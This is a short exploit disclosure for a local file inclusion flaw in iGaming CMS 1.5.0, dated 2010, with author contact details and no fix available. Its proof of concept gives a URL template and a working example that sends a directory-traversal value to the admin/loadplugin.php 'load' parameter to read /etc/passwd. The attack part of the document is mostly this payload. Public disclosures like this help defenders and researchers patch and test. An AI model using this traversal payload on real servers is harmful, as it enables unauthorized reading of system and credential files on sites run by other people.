iGaming CMS 1.5.0 Local File Inclusion

`iGaming CMS 1.5.0 Local File Inclusion Vulnerability  
  
# Exploit Title: iGaming CMS 1.5.0 Local File Inclusion Vulnerability  
# Date: 24-10-2010   
# Author: ZonTa  
# Mail: zontahackers[at]gmail[dot]com   
# IM : zontahackers[at]live[dot]com  
  
# Software Link: http://www.igamingcms.com/downloads.php  
# Version: 1.5.0  
# Tested on: Apache,PHP5,Linux  
  
  
ABOUT iGaming CMS   
--------------  
  
Gaming CMS is a content management system designed  
for gaming websites. The system is written in PHP  
and requires a Mysql database for operation.  
  
  
POC  
--------------  
  
http://<host>/<path>/admin/loadplugin.php?load=<file>  
  
Example :   
  
http://192.168.1.2/iGamingCMS1.5/admin/loadplugin.php?load=../../../../etc/passwd  
  
  
FIX  
--------------  
  
Not yet released.  
  
  
Greetz to Sri Lankanz ~  
  
`